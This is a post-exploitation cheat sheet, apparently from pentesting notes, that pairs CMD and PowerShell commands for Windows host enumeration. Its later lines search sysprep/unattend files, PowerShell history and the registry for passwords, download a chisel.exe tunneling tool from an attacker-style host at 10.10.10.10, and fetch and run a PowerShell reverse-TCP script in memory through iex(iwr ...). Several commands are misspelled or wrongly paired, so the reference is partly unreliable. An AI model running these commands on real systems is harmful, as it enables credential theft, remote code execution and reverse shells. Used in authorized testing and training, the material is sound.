To understand Powershell working and commands formation do checkout
Commands used in post exploitation for CMD and Powershell variants
Copy C: command for cmd
P: command for powershell
Copy C: systeminfo
P: Get-ComputerInfo
Copy C: findstr
P: Select-String -Pattern "OS:"
Copy |
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"
Copy C: whoami [or] echo %username%
P: $env:UserName
Copy C: hostname
P: $env:DomainName [or] $env:Computername
Copy C: net user [or] net user /domain
P: Get-LocalUser
Information about the user
Copy C: net user dnoscp
P: Get-LocalUser dnoscp
Copy C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup
Copy C: net localgroup Administrators
P: Get-LocalGroupMember Administrators
Copy C: ipconfig [or] ipconfig /all
P: Get-NetAdapter
Routing Table information
Copy C: route print
P: Get-NetRoute
Copy C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection
Copy C: schtasks
P: Get-ScheduledTask
Copy C: tasklist /svc
P: Get-Process
Copy C: net start Themes
P: Start-Process -FilePath "sort.exe"
Copy C: drivequery
P: Get-WindowsDriver -Online -All
Copy C: wmic qfe get Caption, Description, InstalledOn, HotFixID
P: (New-Object -com "Microsoft.Update.AutoUpdate"). Results | fl
Copy C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Copy C: dir /s /p /*.txt /*.xml
P: Get-ChildIten -Path . -Include *.txt,*xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'
Search for a string in a file
Copy C: findstr /si "password" *.txt,*.xml
P: Get-ChildItem -Recurse . -Filter *.txt,*.xml | Select-String "password"
Serch registry for passwords
Copy reg query HKLM /f "password" /t REG_SZ /s
reg query HKCU /f "password" /t REG_SZ /s
Copy C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}
Information about the running processes
Copy C: sc query "Spooler"
P: Get-Service "Spooler"
Copy C: copy source_location destination
P: Copy-Item source_location -Destination destination
Copy C: move source_location destination
P: Move-Item source_location -Destination destination
Copy C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe")
Exeucte powershell scripts directly from the memory
Copy P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)
# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)